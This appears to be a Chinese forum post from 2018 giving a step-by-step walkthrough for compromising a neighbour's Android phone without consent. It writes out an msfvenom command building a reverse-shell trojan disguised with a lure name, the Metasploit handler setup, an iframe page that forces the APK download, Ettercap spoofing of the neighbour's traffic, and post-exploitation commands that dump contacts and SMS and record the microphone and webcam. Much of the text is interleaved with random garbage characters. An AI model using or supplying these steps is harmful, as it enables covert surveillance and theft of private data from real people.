|
) G% B/ L4 D+ E; c
五、msf+ettercap入侵邻居安卓手机 ! N% B0 o% ]7 t/ t
3 o# W) K7 c8 m5 ~
7 L, v/ a0 z/ M1 w; w: Y) c
首先启动msf
0 D3 J9 U1 T8 \) r2 K: c K2 z4 W
2 M2 Z4 [; B3 G% ?- _
* f9 C" \. B& O 先用kali生成一个安卓木马,如下命令:
& n8 H0 m& F2 Y* H3 @ ; C j: L4 F! T- |: @( s& r% T
: {& B, W6 i0 M) h7 b! @* K Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 1 h$ n6 L1 |4 N$ M
6 F& ^! f/ K* ]& D6 \5 W. @$ s1 L+ W6 q
 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
7 X: d" t' n4 e# l: D. K 9 R6 {% D3 A& c% s
/ F! C" f9 i5 x+ {7 S x% o 然后进入msf
: L1 w8 r9 O2 c* n8 r ) k+ w, z5 g- Z, ~0 o# V
/ y# O3 l8 v' ]! I5 [5 R4 g
use exploit/multi/handler
2 v) N* `0 m% s 0 X [ z! z" W) Q. X. a$ `/ N
' V, N1 k- ~6 ^3 w set payload android/meterpreter/reverse_tcp
8 N# u( E4 e9 A/ D9 A( k. d
[) a9 P- n" B/ w1 @
9 Q2 P5 q; N& w R' k* V set LHOST 192.168.0.109 //ip为kaili的ip
" e- D3 p" Q( `$ V& ^& |
0 k/ R4 V& G# r: w7 o9 q# V" J/ [- B7 i; @
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ~8 B5 v9 a! p; z6 Y0 e
! e/ p3 @# P% T8 M7 E8 M9 j- [
* L, R& H* r2 B- r4 R& n Exploit
5 T6 K2 @8 L) s$ x
2 ]) H, g6 d( l0 K) e, X9 ^/ ^0 B0 ]! d4 s% w# f
; W8 q) b: ~. c& Z7 b ; a4 k' t _7 E9 C6 }! {
! U) Z4 U8 J7 I
下面我们开启ettercap -G & ?9 [0 q0 D1 E# P& R$ z
: O% s! U0 ]7 ]! d1 q- {
1 U$ n6 j/ J" j0 ]( u T 我物理IP为
2 R( ?* U$ W; W J: t( o6 C
# h/ I/ N2 M: ~& q
+ p: ^' F8 p9 i; r0 z# O# ? 
5 J6 U2 p( Q0 O' x" o) E: P( o , ~4 x9 R# d% e
; a1 }/ d4 y* z+ b T! m" f+ z3 H5 t 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
) _. X% V& n. y, f& [* t4 R2 \
9 A! A8 E: Q, X% }, |; p
; x+ q ~$ f& p7 h% c$ s7 o 下面我们来设置一下 y$ t- P* b3 o" _$ E! c& s' E
e. ~1 N$ C2 @; x, c
: k4 q- z. p1 ^* D9 U 
* F7 u. ^. H* X/ e2 v2 J9 u$ ]1 g - R/ n6 U6 t" s$ P% t
0 z7 `$ n% S1 Y; O) w. x
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , ?- U3 s7 C7 @! f$ x
2 n8 ]* k- Y) t6 s* l6 ]# K2 O# I T7 n; ]* w) b
; a2 m, \+ w- P6 I$ t) Z% M, `" j
: u W' L1 n" C- n. J' H! m' N! Z# I8 E6 X5 Y' E' ]# s
' T" @( d' e8 q, E
/ H2 X! b# a. R/ z$ d7 J( _" K2 A. |* J9 [( e+ Q
$ ?! }# t8 g0 Z4 s' w4 c8 q
( H2 V% i0 e2 T1 Y: K6 P5 G. w4 T
( i: B, l2 A" F# {! v6 X# ? . f+ Q) @% V: w* G
3 _" o0 F m; E. F$ o
1 G( f8 l# M0 X& u* z9 e6 ?3 @. ^, U
q% N' @" Z }1 U/ k/ Q9 z) a ( E1 M- W9 ]% R+ t7 N. I
" @$ O o1 Y7 P6 @, J
( ?5 k4 s# W o# ^ 4 q3 E( ?5 q0 n4 ^6 d
# ^. |! h! W4 x8 V% s& ^
1 f' w2 `/ a) m7 Z8 V- G2 k/ b 0 r' q& \5 G% w! @8 R2 g: R) e! K) ]2 k
8 z0 [$ Y& h7 R$ ^) U
7 [& m- X( Y/ R/ w4 W ( m3 {- V, v6 {% B
$ L+ @ x% V0 ?" F0 x
; u+ ^5 j* v* Y ( S1 |& B! m( i
Y( ]; y$ {8 A6 ~
4 t3 W2 i o5 ?% U) {
b1 K( O, c, R9 Q
/ J I% b& L {: o
( J& ^( j, e" u7 L, _/ \ j4 l! J0 t; D
/ w7 `# [# q, T( N) o , n7 l* r, x+ Y( e
; q& P8 ^8 e8 ? r* i8 Q! v6 z7 `) r5 s, p5 m
' s' N( A8 B% M
3 f( U# K1 q1 x c- Y8 ?5 S) q$ A. t3 b
下面我们开始攻击
) j/ B7 B( B: ]$ I" T
5 }; ]3 ]# `+ U# [) Z. k
, @) L- S# J. j" K {/ F+ G, K8 B
0 P$ s' C: I0 B* H- N1 g6 v" x& w$ U0 n
; N2 I+ v S; d, v3 `# X
3 |" _) k0 u$ w3 R. ?3 `, f : m9 I+ A6 j- L1 }* [
% P$ A9 ]7 U. f2 U$ ~8 \3 J( a8 B& T2 A! L8 d, j+ u% h ?! ]
! c4 I' O) }7 _9 _5 B
7 f4 y8 X4 Y/ Z8 ]# z% Z
) P- @3 f2 {) h+ x. T' H ; W; Z! |3 g) a
0 i) W' X3 {# f. x7 Z }
9 o; s0 Y' l! S) j! ]  ; R5 [7 `+ F$ {; p7 D
) r" B5 m0 ?# y( t
G; e1 V$ z) m1 l. [1 _4 Q 大概过了5分钟多,发现反弹成功了 0 m& {- s* B \' d
* c3 q& |3 D0 z1 J- g. w, x1 h' t- @! h& r
5 [1 o3 b8 ?; b2 q3 V! Q
F4 i; C/ m7 b. D7 ^2 ^( E) J# G
$ l2 _& P- G3 f * q4 K+ [7 _) N5 ~$ n9 j
" Y) E# B! E9 i7 h0 K- A2 k( r* s' d: B
6 E4 ^4 _6 X v) C" W8 D
0 S* i4 f; \3 ?% k3 p
2 X) R4 s6 U: i+ `# v6 K
4 Z! y9 y7 P& @4 O ! W7 P- D8 t' l1 ~0 r/ w0 b
! ]# _: |/ F5 @) i1 r6 V/ X
; ^* A7 _: W5 L5 a2 _( p
* S" @# s, q; @8 d/ K" {+ j% s, d! z
+ g" d8 v% z, w8 `+ I
" E# O7 N- A# ?2 D9 b
3 N4 N6 B) z$ b) p4 x, \
8 `1 T8 w6 \* w
" ?# ?% {3 Y0 s/ W) Z- b) M
* X6 G( U, z0 x* Q4 N5 F" R$ R( Z& { 执行命令 4 c! B O) ?8 H# I3 W3 U! ~6 l6 M
3 _. f4 G; J% J% W
+ z' w! N9 M9 ^$ O1 r/ [' D% f3 F
7 }6 x; _7 o9 Y" ]' z6 }
7 p; z8 b; i, j5 Q) U+ U8 X$ D
/ J4 |. ~% K; S) W4 o/ p, | dump_contacts --》这个是导出电话 d7 _1 w) B1 M* q9 [1 Y) \- W& A6 ?
! }% d# }+ `5 p
( o$ _) m2 X7 g
dump_sms --》这个是导出信息
2 Z" {# z) S' C2 c* X - ~8 O6 D6 ^& L' _# X' }% S4 s
+ |8 f5 l+ s/ A
record_mic Record audio from the default microphone for X seconds
) ~: [: [. k U( r ( X& u! e$ x. i" b% D% m
5 }! r5 h2 J/ M0 b& d
webcam_chat Start a video chat
# H+ P+ G/ f* t ( i9 @+ S3 `: s% d' }6 V" a
& G' h. F% I0 Y: u, B webcam_list List webcams
& }* h, g! ]. W# p F 8 M9 g8 C& Y$ u9 k6 L
) ^2 h, i# s( u- B& v' j webcam_snap Take a snapshot from the specified webcam
" `7 j2 s) {, C" u8 Q + U5 `2 S* }, k {
1 n; o& Y; R+ k8 V' d; O5 Y0 _
webcam_stream  lay a video stream from the specified webcam
k& l1 R( q# i7 d4 a0 d, ?$ O
2 k' y3 u5 ^. _% J
% j$ V& e" O5 ~# v  ~# C% }. S6 a7 h
; H" F, {3 s0 V
& A6 B; m8 }' M6 P) q5 G( l) ~ 
* a. m! `+ r4 G: W
3 }7 I J k& V' W4 C" ^; z1 s/ E! K
- A$ K* _% W) C! a/ b' k 我们打开看一下电话薄,
- N# Y2 U/ K8 l# K7 o( t4 s5 [ ( K1 L5 W2 Y" v# I" t: ^- P: i
; S D3 n+ E+ @7 ~6 G/ @( ^
; U8 t" I% h; [" l. i: l
/ }6 n) E6 z: W0 J
) j8 I$ P- ]6 [+ u  ' z1 l; y [5 s0 U4 k
& {( A0 \% F3 ]2 M! ~& r
1 m: }# ~+ x% w `4 q9 k+ Y
- f, z: ^, V8 P6 H5 z $ c# h/ w* ~4 y; P Y1 L. z8 K" ?
- N; g% Z" f. {
 * ^3 Y: }* E" ^% f4 L( Q6 O9 _! x
* r/ [) h" R3 r
- s) `7 F( ~1 v4 p% f) e9 X0 h2 K  ^/ L/ j* s' K: E
3 B- \! u+ W- t5 j( o1 Z* X
% b6 R8 V# p, F5 I1 J% u# p
$ e* s P! H. P$ |1 O5 h+ ?8 Y
/ O1 o7 Q- l2 Q5 w; c* ^ w: x. Y1 M; A: Y X
我们同时欺骗成DroidJack木马,使用方法如图:
Y% |& M5 A5 {+ a6 s
2 ~8 k% S% V7 l$ s2 n( ^1 F0 p
( Y8 S, \( \' N 
0 S# H7 I V1 W& x2 p2 @, a 9 O% W4 r) Z e6 ^* R- i6 V
7 _$ F' Z4 W+ x. L/ I8 v/ m) s ( ^) v# ]* R( P4 i
# Q: @4 P: {2 A0 O' }: k. |% v* g
- I' L+ F. E' c5 W' h
& D0 w1 m$ W0 ]+ H& Z
0 t2 |1 \1 Q# I3 H2 c' C7 r4 X, @2 @4 p, ~/ u* }, |# A2 c0 b) g
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 2 R: L1 `- V3 e. t! x$ G5 y, a
5 S9 T5 V2 W+ o
! d. ^! h2 ~; C- [ 
. n' ]* c5 K1 _& Y; [# O
- {2 _( F) w/ B, v5 E& ?; P
" u$ z# x5 c x$ K5 E* b  ' `# r* l. k- C+ ^; Y* r: B3 z8 n; [
; f: T3 R" V* q# E! V* L6 r
0 Y0 b6 y# u- |' t  1 H4 C: L& h" E$ H. U
0 H7 V- Q. i. Y5 N3 g7 @- U" p2 q; ?4 P/ c/ n
 
; i; Z6 R% @% `5 e% h9 D/ x / C2 F8 G! c7 O. I& [: w+ n" @7 t2 P
% {) b, M5 Z$ N8 c. n6 [% f0 A' E
9 Q/ C" ~" E' q6 b0 m4 u | 
发表于 2018-10-20 20:30:37
收藏
分享
支持
反对